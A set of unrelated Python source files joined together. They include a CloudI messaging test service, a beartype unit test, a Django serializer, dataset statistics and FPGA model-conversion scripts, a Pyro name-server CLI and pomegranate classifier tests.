# pylint: disable=too-many-statements
# consume all the 'end' responses from all sequences handled
# by this service
while self.__api.recv_async(timeout=1000)[1] == b'end':
pass
iteration = int(request)
print('messaging sequence1 start %s (%d)' % (
self.__name,
iteration,
))
test1_id = self.__api.send_async(
self.__api.prefix() + 'a/b/c/d', b'test1'
)
test2_id = self.__api.send_async(
self.__api.prefix() + 'a/b/c/z', b'test2'
)
test3_id = self.__api.send_async(
self.__api.prefix() + 'a/b/c/dd', b'test3'
)
test4_id = self.__api.send_async(
self.__api.prefix() + 'a/b/z/d', b'test4'
)
test5_id = self.__api.send_async(
self.__api.prefix() + 'a/b/cc/d', b'test5'
)
test6_id = self.__api.send_async(
self.__api.prefix() + 'a/z/c/d', b'test6'
)
test7_id = self.__api.send_async(
self.__api.prefix() + 'a/bb/c/d', b'test7'
)
test8_id = self.__api.send_async(
self.__api.prefix() + 'z/b/c/d', b'test8'
)
test9_id = self.__api.send_async(
self.__api.prefix() + 'aa/b/c/d', b'test9'
)
test10_id = self.__api.send_async(
self.__api.prefix() + 'a/b/czd', b'test10'
)
test11_id = self.__api.send_async(
self.__api.prefix() + 'a/bzc/d', b'test11'
)
test12_id = self.__api.send_async(
self.__api.prefix() + 'azb/c/d', b'test12'
)
test13_id = self.__api.send_async(
self.__api.prefix() + 'a/bzczd', b'test13'
)
test14_id = self.__api.send_async(
self.__api.prefix() + 'azbzc/d', b'test14'
)
test15_id = self.__api.send_async(
self.__api.prefix() + 'azbzczd', b'test15'
)
# n.b., depends on cloudi_core_i_constants.hrl having
# RECV_ASYNC_STRATEGY == recv_async_select_oldest
self.__api.recv_async(trans_id=test1_id, consume=False)
(_, test1_check, test1_id_check) = self.__api.recv_async()
assert test1_check == b'test1'
assert test1_id_check == test1_id
self.__api.recv_async(trans_id=test2_id, consume=False)
(_, test2_check, test2_id_check) = self.__api.recv_async()
assert test2_check == b'test2'
assert test2_id_check == test2_id
self.__api.recv_async(trans_id=test3_id, consume=False)
(_, test3_check, test3_id_check) = self.__api.recv_async()
assert test3_check == b'test3'
assert test3_id_check == test3_id
self.__api.recv_async(trans_id=test4_id, consume=False)
(_, test4_check, test4_id_check) = self.__api.recv_async()
assert test4_check == b'test4'
assert test4_id_check == test4_id
self.__api.recv_async(trans_id=test5_id, consume=False)
(_, test5_check, test5_id_check) = self.__api.recv_async()
assert test5_check == b'test5'
assert test5_id_check == test5_id
self.__api.recv_async(trans_id=test6_id, consume=False)
(_, test6_check, test6_id_check) = self.__api.recv_async()
assert test6_check == b'test6'
assert test6_id_check == test6_id
self.__api.recv_async(trans_id=test7_id, consume=False)
(_, test7_check, test7_id_check) = self.__api.recv_async()
assert test7_check == b'test7'
assert test7_id_check == test7_id
self.__api.recv_async(trans_id=test8_id, consume=False)
(_, test8_check, test8_id_check) = self.__api.recv_async()
assert test8_check == b'test8'
assert test8_id_check == test8_id
self.__api.recv_async(trans_id=test9_id, consume=False)
(_, test9_check, test9_id_check) = self.__api.recv_async()
assert test9_check == b'test9'
assert test9_id_check == test9_id
self.__api.recv_async(trans_id=test10_id, consume=False)
(_, test10_check, test10_id_check) = self.__api.recv_async()
assert test10_check == b'test10'
assert test10_id_check == test10_id
self.__api.recv_async(trans_id=test11_id, consume=False)
(_, test11_check, test11_id_check) = self.__api.recv_async()
assert test11_check == b'test11'
assert test11_id_check == test11_id
self.__api.recv_async(trans_id=test12_id, consume=False)
(_, test12_check, test12_id_check) = self.__api.recv_async()
assert test12_check == b'test12'
assert test12_id_check == test12_id
self.__api.recv_async(trans_id=test13_id, consume=False)
(_, test13_check, test13_id_check) = self.__api.recv_async()
assert test13_check == b'test13'
assert test13_id_check == test13_id
self.__api.recv_async(trans_id=test14_id, consume=False)
(_, test14_check, test14_id_check) = self.__api.recv_async()
assert test14_check == b'test14'
assert test14_id_check == test14_id
self.__api.recv_async(trans_id=test15_id, consume=False)
(_, test15_check, test15_id_check) = self.__api.recv_async()
assert test15_check == b'test15'
assert test15_id_check == test15_id
print('messaging sequence1 end %s (%d)' % (
self.__name,
iteration,
))
# start sequence2
self.__api.send_async(self.__api.prefix() + 'sequence2', request)
self.__api.return_(request_type, name, pattern,
b'', b'end', timeout, trans_id, pid)
def __sequence2_e1(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
self.__api.return_(request_type, name, pattern,
b'', b'1', timeout, trans_id, pid)
def __sequence2_e2(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
self.__api.return_(request_type, name, pattern,
b'', b'2', timeout, trans_id, pid)
def __sequence2_e3(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
self.__api.return_(request_type, name, pattern,
b'', b'3', timeout, trans_id, pid)
def __sequence2_e4(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
self.__api.return_(request_type, name, pattern,
b'', b'4', timeout, trans_id, pid)
def __sequence2_e5(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
self.__api.return_(request_type, name, pattern,
b'', b'5', timeout, trans_id, pid)
def __sequence2_e6(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
self.__api.return_(request_type, name, pattern,
b'', b'6', timeout, trans_id, pid)
def __sequence2_e7(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
self.__api.return_(request_type, name, pattern,
b'', b'7', timeout, trans_id, pid)
def __sequence2_e8(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
self.__api.return_(request_type, name, pattern,
b'', b'8', timeout, trans_id, pid)
def __sequence2(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
# pylint: disable=too-many-locals
iteration = int(request)
print('messaging sequence2 start %s (%s)' % (
self.__name,
iteration,
))
while True:
# the sending process is excluded from the services that receive
# the asynchronous message, so in this case, the receiving thread
# will not be called, despite the fact it has subscribed to 'e',
# to prevent a process (in this case thread) from deadlocking
# with itself.
e_ids = self.__api.mcast_async(self.__api.prefix() + 'e', b' ')
# 4 * 8 == 32, but only 3 out of 4 threads can receive messages,
# since 1 thread is sending the mcast_async, so 3 * 8 == 24
if len(e_ids) == 24:
e_check_list = []
for e_id in e_ids:
(_,
e_check,
e_id_check) = self.__api.recv_async(trans_id=e_id)
assert e_id == e_id_check
e_check_list.append(e_check)
e_check_list.sort()
assert b''.join(e_check_list) == b'111222333444555666777888'
break
else:
print('Waiting for %s services to initialize' % (
str(4 - len(e_ids) / 8.0),
))
for e_id in e_ids:
(_,
e_check,
e_id_check) = self.__api.recv_async(trans_id=e_id)
assert e_id == e_id_check
null_id = self.__api.recv_async(timeout=1000)[2]
assert null_id == b'\0' * 16
print('messaging sequence2 end %s (%s)' % (
self.__name,
iteration,
))
# start sequence3
self.__api.send_async(self.__api.prefix() + 'sequence3', request)
self.__api.return_(request_type, name, pattern,
b'', b'end', timeout, trans_id, pid)
def __sequence3_f1(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
request_i = int(request)
if request_i == 4:
return b'done'
request_new = request_i + 2 # two steps forward
self.__api.forward_(request_type, self.__api.prefix() + 'f2',
request_info,
('%d' % request_new).encode('ascii'),
timeout, priority, trans_id, pid)
return None # execution doesn't get here
def __sequence3_f2(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
request_i = int(request)
request_new = request_i - 1 # one step back
self.__api.forward_(request_type, self.__api.prefix() + 'f1',
request_info,
('%d' % request_new).encode('ascii'),
timeout, priority, trans_id, pid)
def __sequence3_g1(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
self.__api.return_(request_type, name, pattern,
b'', request + b'suffix', timeout, trans_id, pid)
def __sequence3(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
# pylint: disable=too-many-locals
iteration = int(request)
print('messaging sequence3 start %s (%s)' % (
self.__name,
iteration,
))
test1_id = self.__api.send_async(
self.__api.prefix() + 'f1', b'0'
)
(_, test1_check, test1_id_check) = self.__api.recv_async(
trans_id=test1_id
)
assert test1_id_check == test1_id
assert test1_check == b'done'
(_, test2_check, _) = self.__api.send_sync(
self.__api.prefix() + 'g1', b'prefix_'
)
assert test2_check == b'prefix_suffix'
print('messaging sequence3 end %s (%s)' % (
self.__name,
iteration,
))
# loop to find any infrequent problems, restart sequence1
iteration += 1
self.__api.send_async(
self.__api.prefix() + 'sequence1',
('%d' % iteration).encode('ascii'),
)
self.__api.return_(request_type, name, pattern,
b'', b'end', timeout, trans_id, pid)
def _main():
thread_count = API.thread_count()
assert thread_count >= 1
threads = [Task(thread_index, 'python', TerminateException)
for thread_index in range(thread_count)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
if __name__ == '__main__':
_main()
|
StarcoderdataPython
|
1841711
|
<filename>beartype_test/a00_unit/a00_util/mod/test_utilmoddeprecate.py
#!/usr/bin/env python3
# --------------------( LICENSE )--------------------
# Copyright (c) 2014-2022 Beartype authors.
# See "LICENSE" for further details.
'''
Project-wide **Python module deprecation** unit tests.
This submodule unit tests the public API of the private
:mod:`beartype._util.mod.utilmoddeprecate` submodule.
'''
# ....................{ IMPORTS }....................
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# WARNING: To raise human-readable test errors, avoid importing from
# package-specific submodules at module scope.
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# ....................{ TESTS }....................
def test_deprecate_module_attr() -> None:
'''
Test the
:func:`beartype._util.mod.utilmoddeprecate.deprecate_module_attr` function.
'''
# Defer heavyweight imports.
from beartype._util.mod.utilmoddeprecate import deprecate_module_attr
from pytest import raises, warns
# Dictionary mapping from the deprecated to non-deprecated name of
# arbitrary objects masquerading as deprecated and non-deprecated
# attributes (respectively) of an arbitrary submodule.
ATTR_DEPRECATED_NAME_TO_NONDEPRECATED_NAME = {
# Deprecated names originating from public non-deprecated names in the
# "ATTR_NONDEPRECATED_NAME_TO_VALUE" dictionary defined below.
'Robes_some_unsculptured_image': 'Thine_earthly_rainbows',
# Deprecated names originating from private non-deprecated names in
# that dictionary, exercising an edge case.
'The_strange_sleep': '_Of_the_aethereal_waterfall',
# Deprecated names originating from non-deprecated names *NOT* in that
# dictionary, exercising an edge case.
'Wraps_all_in': 'its_own_deep_eternity',
}
# Dictionary mapping from the name to value of arbitrary objects
# masquerading as non-deprecated attributes of an arbitrary submodule.
ATTR_NONDEPRECATED_NAME_TO_VALUE = {
'Thine_earthly_rainbows': "stretch'd across the sweep",
'_Of_the_aethereal_waterfall': 'whose veil',
# Globally scoped attribute required by deprecate_module_attr().
'__name__': 'Lines.Written_in_the.Vale_of.Chamouni',
}
# Assert this function both emits the expected warning and returns the
# expected value of a deprecated attribute originating from a public
# non-deprecated attribute of an arbitrary submodule.
with warns(DeprecationWarning):
assert deprecate_module_attr(
attr_deprecated_name='Robes_some_unsculptured_image',
attr_deprecated_name_to_nondeprecated_name=(
ATTR_DEPRECATED_NAME_TO_NONDEPRECATED_NAME),
attr_nondeprecated_name_to_value=ATTR_NONDEPRECATED_NAME_TO_VALUE,
) == "stretch'd across the sweep"
# Assert this function both emits the expected warning and returns the
# expected value of a deprecated attribute originating from a private
# non-deprecated attribute of an arbitrary submodule.
with warns(DeprecationWarning):
assert deprecate_module_attr(
attr_deprecated_name='The_strange_sleep',
attr_deprecated_name_to_nondeprecated_name=(
ATTR_DEPRECATED_NAME_TO_NONDEPRECATED_NAME),
attr_nondeprecated_name_to_value=ATTR_NONDEPRECATED_NAME_TO_VALUE,
) == 'whose veil'
# Assert this function raises the expected exception when passed any name
# other than that of a deprecated attribute.
with raises(AttributeError):
assert deprecate_module_attr(
attr_deprecated_name='Which when the voices of the desert fail',
attr_deprecated_name_to_nondeprecated_name=(
ATTR_DEPRECATED_NAME_TO_NONDEPRECATED_NAME),
attr_nondeprecated_name_to_value=ATTR_NONDEPRECATED_NAME_TO_VALUE,
)
# Assert this function raises the expected exception when passed the name
# of a deprecated attribute whose corresponding non-deprecated attribute is
# *NOT* defined by this submodule.
with raises(AttributeError):
assert deprecate_module_attr(
attr_deprecated_name='Wraps_all_in',
attr_deprecated_name_to_nondeprecated_name=(
ATTR_DEPRECATED_NAME_TO_NONDEPRECATED_NAME),
attr_nondeprecated_name_to_value=ATTR_NONDEPRECATED_NAME_TO_VALUE,
)
|
StarcoderdataPython
|
92373
|
from .binarytrees import *
|
StarcoderdataPython
|
1944884
|
<gh_stars>1-10
from django.core.exceptions import ValidationError
from rest_framework import serializers
from .models import Order
class OrderSerializer(serializers.ModelSerializer):
"""Serializer definition for Order."""
status = serializers.CharField(source="get_status_display", read_only=True)
class Meta:
model = Order
fields = "__all__"
read_only = ("id", "made_at")
def validate_customer(self, value):
"""Customer id validation.
Args:
value (int): Customer id.
Returns:
value (int): Customer id.
"""
if value < 0:
raise ValidationError("Must be greater then 0.")
return value
|
StarcoderdataPython
|
1898675
|
<filename>stats_bbox_tr.py
import os
from os import listdir
from os.path import join
from bbox_tr import bbox_tr_get_wh
in_dir = r'E:\SourceCode\Python\TRD\DOTA'
out_dir = r'E:\SourceCode\Python\TRD'
cls_stats = {}
valid_objs = 0
total_objs = 0
for i in os.listdir(in_dir):
image_id,image_ext = os.path.splitext(i)
if image_ext.lower() == '.txt':
in_file = open(join(in_dir,i), 'r')
for line in in_file:
parts = line.split()
if len(parts) > 6:
cls_id = int(parts[0])
bbox = [float(x) for x in parts[1:7]]
w,h = bbox_tr_get_wh(bbox)
if w <= 0.0:
continue
total_objs = total_objs + 1
if w >= 12:
valid_objs = valid_objs+1
ar = h/w
if cls_id in cls_stats:
cls_stat = cls_stats[cls_id]
if cls_stat[0] > ar:
cls_stat[0] = ar
if cls_stat[1] < ar:
cls_stat[1] = ar
cls_stat[2] = cls_stat[2] + ar
if cls_stat[3] > w:
cls_stat[3] = w
if cls_stat[4] < w:
cls_stat[4] = w
if cls_stat[5] > h:
cls_stat[5] = h
if cls_stat[6] < h:
cls_stat[6] = h
cls_stat[7] = cls_stat[7] + 1
else:
cls_stats[cls_id] = [ar,ar,ar,w,w,h,h,1]
in_file.close()
for cls_id in cls_stats:
cls_stat = cls_stats[cls_id]
cls_stat[2] = cls_stat[2]/cls_stat[7]
cls_stats_file = open(join(out_dir,"cls_stats.txt"), 'w')
for cls_id in cls_stats:
cls_stat = cls_stats[cls_id]
cls_stats_file.write( '%3d, %6.3f, %6.3f, %6.3f, %6.3f, %6.3f, %6.3f, %6.3f, %5d\n'%(
cls_id,cls_stat[0],cls_stat[1],cls_stat[2],
cls_stat[3],cls_stat[4],cls_stat[5],cls_stat[6],
cls_stat[7])
)
cls_stats_file.write('vaid_objs = %d\n'%valid_objs)
cls_stats_file.write('total_objs = %d'%total_objs)
cls_stats_file.close()
|
StarcoderdataPython
|
179100
|
#!/usr/bin/python3.4
# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Name server control module. Slightly enhanced for QA package.
"""
from pycopia.remote import pyro
def print_listing(listing):
for name, uri in sorted(listing.items()):
if len(uri) > 45:
print(("{:>35.35s} --> \n{:>79.79s}".format(name, uri)))
else:
print(("{:>35.35s} --> {}".format(name, uri)))
_DOC = """nsc [-h?]
Control or query the name server.
Subcommands:
list - show current objects.
ping - No error if server is reachable.
remove <name> - remove the named agent entry.
"""
def nsc(argv):
import getopt
try:
optlist, args = getopt.getopt(argv[1:], "h?")
except getopt.GetoptError:
print(_DOC)
return 2
for opt, optarg in optlist:
if opt in ("-h", "-?"):
print(_DOC)
return
try:
subcmd = args[0]
except IndexError:
print(_DOC)
return 2
args = args[1:]
nameserver = pyro.locate_nameserver()
if subcmd.startswith("li"):
if args:
print_listing(nameserver.list(prefix=args[0]))
else:
print_listing(nameserver.list())
elif subcmd.startswith("pi"):
nameserver.ping()
print("Name server is alive.")
if subcmd.startswith("rem"):
if args:
nameserver.remove(name=args[0])
else:
print(_DOC)
return 2
if __name__ == "__main__":
import sys
from pycopia import autodebug
nsc(sys.argv)
|
StarcoderdataPython
|
11288249
|
#%%
import os
import numpy as np
import matplotlib.pyplot as plt
import json
from soil_classifier.dataset import Landsat
from soil_classifier.models import minimals as models_lib
from soil_classifier.utils import fpga_report, load_model
from soil_classifier.utils import model_checkout, ip_checkout
from soil_classifier.utils import make_config, save_config
from soil_classifier.utils import convert, build
cwd = os.getcwd()
DATA_FOLDER = cwd + '/data/'
OUTPUT_FOLDER = cwd + '/outputs/'
MODELS_FOLDER = cwd + '/models/'
CONFIG_FOLDER = cwd + '/configs/'
FPGA_FOLDER = cwd + '/fpga/'
IPS_FOLDER = cwd + '/ip/'
MODEL_SRC_PATH = OUTPUT_FOLDER
MODEL_DST_PATH = MODELS_FOLDER
#%% PARAMETERS
SEED = 0
# Model
MODEL_NAME = 'ANN50x50'
# MODEL_NAME = 'ANN100x100'
# Dataset
X_DATA_PROC = 'standarization' # options: standarization/normalization/original
Y_DATA_PROC = 'one-hot'
FPGA_DATA_FORMAT = '%.6f'
# Training
retrain = False
N_epochs = 200
batch_size = 32
do_model_checkout = True
# Config (conversion Keras to HLS)
# The max number of multipliers should be less tahn 4096, adjust reuse_factor to be compliant with this.
PART = 'xazu7eg-fbvb900-1-i'
T_CLK = 24 # ns
IO_TYPE = 'io_parallel' # options: io_serial/io_parallel
PRECISION = [16, 10]
REUSE_FACTOR = 4
# REUSE_FACTOR = 100
# STRATEGY = 'Latency' # options: Latency/Resource
STRATEGY = 'Resource' # options: Latency/Resource
# Layer config (optional and only if it is necessary)
# this parameter should be a list of dictionaries.
# by name:
# layers = [{'name': < >, 'reuse_factor': < >, 'strategy': < >, 'compression': < >}]
# by type:
# layers = [{'type': < >, 'reuse_factor': < >, 'strategy': < >, 'compression': < >}]
# default values: strategy: 'Latency', compression: False
# Default
LAYERS_CONFIG = None
# Custom
# LAYERS_CONFIG = [{
# 'name': 'fc1',
# 'reuse_factor': 10
# },
# {
# 'name': 'fc2',
# 'reuse_factor': 10
# },
# {
# 'name': 'predictions',
# 'reuse_factor': 6
# }
# ]
# Conversion
HLS_PROJECT = 'hls_' + MODEL_NAME
FPGA_PROJECT = 'fpga_' + MODEL_NAME
CONFIG_FILE = CONFIG_FOLDER + 'keras_config_{model_name}.yml'.format(model_name=MODEL_NAME)
FPGA_PROJECT_FOLDER = FPGA_FOLDER + 'hls_' + MODEL_NAME + '/'
FPGA_INFERENCE_FILE = FPGA_PROJECT_FOLDER + 'tb_data/rtl_cosim_results.log'
OUTPUT_REPORT_FILE = OUTPUT_FOLDER + MODEL_NAME + '_report.json'
# Exporting
do_ip_checkout = True
IP_SRC_PATH = FPGA_PROJECT_FOLDER+'fpga_'+MODEL_NAME+'_prj/solution1/impl/ip/'
IP_DST_PATH = IPS_FOLDER
np.random.seed(SEED)
parameter_report = {'params': {
'model_name': MODEL_NAME,
'dataset': 'Landsat',
'x_data_proc': X_DATA_PROC,
'y_data_proc': Y_DATA_PROC,
'fpga_data_format': FPGA_DATA_FORMAT,
'epochs': N_epochs,
'batch_size': batch_size,
'part': PART,
't_clk': T_CLK,
'io_type': IO_TYPE,
'precision': PRECISION,
'reuse_factor': REUSE_FACTOR,
'strategy': STRATEGY
}}
#%% some functions
def isnotebook():
try:
shell = get_ipython().__class__.__name__
if shell == 'ZMQInteractiveShell':
return True # Jupyter notebook or qtconsole
elif shell == 'TerminalInteractiveShell':
return False # Terminal running IPython
else:
return False # Other type (?)
except NameError:
return False # Probably standard Python interpreter
# %% Dataset loading
print('\nDataset loading and processing')
dataset = Landsat()
dataset.load(shuffle=True, seed=SEED)
x_train, y_train, x_test, y_test = dataset.posprocess(x_proc_type=X_DATA_PROC, y_proc_type=Y_DATA_PROC)
print('\nSaving data in text (dat) file for FPGA synth testing...')
DATASET_NAME = dataset.name
np.savetxt(DATA_FOLDER+DATASET_NAME+'_x_train.dat', x_train, fmt=FPGA_DATA_FORMAT)
np.savetxt(DATA_FOLDER+DATASET_NAME+'_y_train.dat', y_train, fmt=FPGA_DATA_FORMAT)
np.savetxt(DATA_FOLDER+DATASET_NAME+'_x_test.dat', x_test, fmt=FPGA_DATA_FORMAT)
np.savetxt(DATA_FOLDER+DATASET_NAME+'_y_test.dat', y_test, fmt=FPGA_DATA_FORMAT)
TEST_FILES = [DATASET_NAME+'_x_test.dat', DATASET_NAME+'_y_test.dat']
print('done!')
#%% Model loading or Training
if retrain == False:
try:
model = models_lib.new_model(MODEL_NAME)
model.load(MODEL_NAME, path=MODELS_FOLDER, verbose=1)
model.compile()
model.summary()
except:
print('Model loading fail! we will retrain model')
retrain = True
if retrain == True:
print('\nLoading and compiling model {}'.format(MODEL_NAME))
model = models_lib.new_model(MODEL_NAME)
model.compile()
model.summary()
print('\nTraining')
history = model.fit(x_train, y_train,
epochs=N_epochs, batch_size=batch_size,
validation_data=(x_test, y_test))
#%% evaluation
print('\n')
# show train accuracy
train_score = model.evaluate(x_train, y_train, verbose=0)
print('MODEL {} - train accuracy = {:.3f}'.format(model.name, train_score[1]))
# show test accuracy
test_score = model.evaluate(x_test, y_test, verbose=0)
print('MODEL {} - test accuracy = {:.3f}'.format(model.name, test_score[1]))
if retrain == True:
# append epochos to history
epochs = range(1,N_epochs+1)
history.history.update( {'epochs': epochs})
# save history
np.save(OUTPUT_FOLDER+'history_{}.npy'.format(model.name), history.history)
print( 'Training history saved in ' + OUTPUT_FOLDER + 'history_{}.npy'.format(model.name) )
# Plot training results
print('\nSaving training plots in ' + OUTPUT_FOLDER)
# loss
fig = plt.figure(figsize=(16,8))
plt.plot(epochs, history.history['loss'], label='loss')
plt.plot(epochs, history.history['val_loss'], label='val_loss')
plt.xlabel('epochs')
plt.ylabel('loss value')
plt.xlim(xmin=1)
plt.ylim(ymin=0)
plt.grid()
plt.legend()
plt.title('{} model - Loss'.format(model.name))
fig.savefig(OUTPUT_FOLDER+'{}_loss.png'.format(model.name))
# plt.show(block=False)
# acc
fig = plt.figure(figsize=(16,8))
plt.plot(epochs, history.history['acc'], label='acc')
plt.plot(epochs, history.history['val_acc'], label='val_acc')
plt.xlabel('epochs')
plt.ylabel('accuaracy')
plt.xlim(xmin=1)
plt.ylim(ymin=0.6, ymax=1.01)
plt.grid()
plt.legend()
plt.title('{} model - Accuracy'.format(model.name))
fig.savefig(OUTPUT_FOLDER+'{}_acc.png'.format(model.name))
# plt.show(block=False)
# %% save model
print('\nSaving model in ' + OUTPUT_FOLDER)
model.save(OUTPUT_FOLDER)
#%% checkout model
print('\n')
# check if you are not in a ipython notebook
if not isnotebook() and retrain:
terminal_input = input('Do you want to checkout your model (it overrides previous model with same name) y/[n]: ')
if terminal_input == 'y':
do_model_checkout = True
else:
do_model_checkout = False
print('Model checkout denied!')
if do_model_checkout:
print('Doing model checkout...')
model_checkout(model.name, src_path=MODEL_SRC_PATH, dst_path=MODEL_DST_PATH)
else:
print('Your model has not been checked out, look for it in ' + OUTPUT_FOLDER )
#%% Create config file
CONFIG_FILE = CONFIG_FOLDER + 'keras_config_{model_name}.yml'.format(model_name=model.name)
config_str = make_config(model_name=model.name,
part=PART,
t_clk=T_CLK,
io_type=IO_TYPE,
precision=[PRECISION[0], PRECISION[1]],
reuse_factor=REUSE_FACTOR,
strategy=STRATEGY,
layers=LAYERS_CONFIG,
test_data=TEST_FILES,
root_path=cwd)
save_config(config_str, CONFIG_FILE)
# %% Conversion and building
print('Converting from keras to HLS...')
# removing previous FPGA project folder/files
print('\tremoving previous {model} FPGA project folder/files'.format(model=model.name))
os.system('rm {prj_folder}* -r'.format(prj_folder=FPGA_PROJECT_FOLDER))
# model conversion
print('\tConverting {model} according to {config}'.format(model=model.name, config=CONFIG_FILE))
convert(CONFIG_FILE)
# model building
print('\tBuilding HLS project into {prj_folder}'.format(prj_folder=FPGA_PROJECT_FOLDER))
build(FPGA_PROJECT_FOLDER)
#%% Parse FPGA report
print('\nGenerating FPGA synth report')
REPORT_FILE = FPGA_FOLDER + HLS_PROJECT + '/' + FPGA_PROJECT + '_prj/solution1/solution1_data.json'
report = fpga_report(REPORT_FILE, FPGA_PROJECT)
for k in report.keys():
print('{}:'.format(k))
for l in report[k]:
print('\t{}: {}'.format(l, report[k][l]))
print('\nSaving FPGA synth report')
with open(OUTPUT_FOLDER+FPGA_PROJECT+'_report.json', 'w') as f:
json.dump(report, f)
#%% Module reloading for inference
print('\nReloading model to obtain classification performance metrics')
if do_model_checkout:
model = load_model(MODEL_NAME, path=MODEL_DST_PATH, verbose=1)
else:
model = load_model(MODEL_NAME, path=MODEL_SRC_PATH, verbose=1)
#%% Inferences
print('\tPerforming original model inferences')
# convert y to class format
y_train_class = np.argmax(y_train, axis=1)
y_test_class = np.argmax(y_test, axis=1)
# original model inferences
y_train_pred = model.predict(x_train)
y_test_pred = model.predict(x_test)
y_train_class_pred = np.argmax(y_train_pred, axis=1)
y_test_class_pred = np.argmax(y_test_pred, axis=1)
print('\tPerforming FPGA implementation inference over test dataset')
# iferences with original model using test data for fpga
# read data used for HLS simulation
x_fpga = np.genfromtxt(DATA_FOLDER+TEST_FILES[0], delimiter=' ').astype(np.float32)
# do inference with original model
y_fpga_best_pred = model.predict(x_fpga)
# convert predictions to class numbers
y_fpga_class_best_pred = np.argmax(y_fpga_best_pred, axis=1)
#%% accuracy metrics
print('\nAccuracy report')
model_train_acc = np.mean(y_train_class_pred == y_train_class)
print('\tOriginal model inference train accuracy = {:.4f}'.format(model_train_acc))
model_test_acc = np.mean(y_test_class_pred == y_test_class)
print('\tOriginal model inference test accuracy = {:.4f}'.format(model_test_acc))
fpga_best_acc = np.mean(y_fpga_class_best_pred == y_test_class)
print('\tFPGA expected inference accuracy = {:.4f}'.format(fpga_best_acc))
# read data from HLS simulation
y_fpga_pred = np.genfromtxt(FPGA_INFERENCE_FILE, delimiter=' ')
# convert predictions to class numbers
y_fpga_class_pred = np.argmax(y_fpga_pred, axis=1)
# accuracy
fpga_acc = np.mean(y_fpga_class_pred == y_test_class)
print('\tFPGA inference accuracy = {:.4f}'.format(fpga_acc))
metric_report = {'acc': {
'model_train_acc': model_train_acc,
'model_test_acc': model_test_acc,
'fpga_best_acc': fpga_best_acc,
'fpga_acc': fpga_acc
}}
# %% Whole report
report.update(parameter_report)
report.update(metric_report)
# save report
with open(OUTPUT_REPORT_FILE, 'w') as f:
json.dump(report, f, indent=4)
#%% IP checkout
print('\nIP checkout:')
# check if you are not in a ipython notebook
if not isnotebook():
terminal_input = input('Do you want to checkout FPGA IP generated (it overrides previous IP with same name) y/[n]: ')
if terminal_input == 'y':
do_ip_checkout = True
else:
do_ip_checkout = False
print('IP checkout denied!')
if do_ip_checkout:
print('Doing IP checkout...')
ip_checkout(model.name, src_path=IP_SRC_PATH, dst_path=IP_DST_PATH)
else:
print('Your IP has not been checked out, look for it in ' + IP_DST_PATH )
# %%
print('\n Run is complete!')
|
StarcoderdataPython
|
2409
|
from __future__ import (division)
from pomegranate import *
from pomegranate.io import DataGenerator
from pomegranate.io import DataFrameGenerator
from nose.tools import with_setup
from nose.tools import assert_almost_equal
from nose.tools import assert_equal
from nose.tools import assert_not_equal
from nose.tools import assert_less_equal
from nose.tools import assert_raises
from nose.tools import assert_true
from numpy.testing import assert_array_almost_equal
import pandas
import random
import pickle
import numpy as np
nan = numpy.nan
def setup_multivariate_gaussian():
mu, cov = [0, 0, 0], numpy.eye(3)
d1 = MultivariateGaussianDistribution(mu, cov)
mu, cov = [2, 2, 2], numpy.eye(3)
d2 = MultivariateGaussianDistribution(mu, cov)
global model
model = BayesClassifier([d1, d2])
global X
X = numpy.array([[ 0.3, 0.5, 0.1],
[ 0.8, 1.4, 0.5],
[ 1.4, 2.6, 1.8],
[ 4.2, 3.3, 3.7],
[ 2.6, 3.6, 3.3],
[ 3.1, 2.2, 1.7],
[ 1.8, 2.2, 1.8],
[-1.2, -1.8, -1.5],
[-1.8, 0.3, 0.5],
[ 0.7, -1.3, -0.1]])
global y
y = [0, 0, 0, 1, 1, 1, 1, 0, 0, 0]
global X_nan
X_nan = numpy.array([[ 0.3, nan, 0.1],
[ nan, 1.4, nan],
[ 1.4, 2.6, nan],
[ nan, nan, nan],
[ nan, 3.6, 3.3],
[ 3.1, nan, 1.7],
[ nan, nan, 1.8],
[-1.2, -1.8, -1.5],
[ nan, 0.3, 0.5],
[ nan, -1.3, nan]])
def setup_multivariate_mixed():
mu, cov = [0, 0, 0], numpy.eye(3)
d1 = MultivariateGaussianDistribution(mu, cov)
d21 = ExponentialDistribution(5)
